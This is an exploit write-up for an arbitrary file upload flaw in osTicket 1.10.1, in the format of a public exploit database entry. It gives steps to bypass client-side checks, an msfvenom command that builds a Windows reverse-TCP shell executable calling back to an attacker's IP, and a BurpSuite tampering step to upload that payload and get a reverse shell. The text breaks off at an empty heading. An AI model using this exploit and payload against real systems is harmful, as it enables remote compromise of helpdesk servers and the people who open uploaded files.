# Exploit Title: osTicket 1.10.1 - Arbitrary File Upload
# Exploit Author: r3j10r (Rajwinder Singh)
# Date: 2018-08-08
# Vendor Homepage: http://osticket.com/
# Software Link: http://osticket.com/download
# Version: osTicket v1.10.1
# Vulnerability Details:
# osTicket application provides a functionality to upload 'html' files
# with associated formats. However, application does not properly validate
# the content of file and accepts any type of files.
# Uploaded shell to get reverse shell of end user for the demo purpose.
1. Created a valid '.html' file to bypass client-side validations.
2. Created a reverse shell with '.exe' file extension using msfvenom.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<YOUR IP> LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe
3. Intercepted the request in BurpSuite and changed file extension '.html' to '.exe' and its content
4. Received a valid response from server along with uploaded malicious file.
5. Got reverse shell after execution of the uploaded payload.
# Affected Component: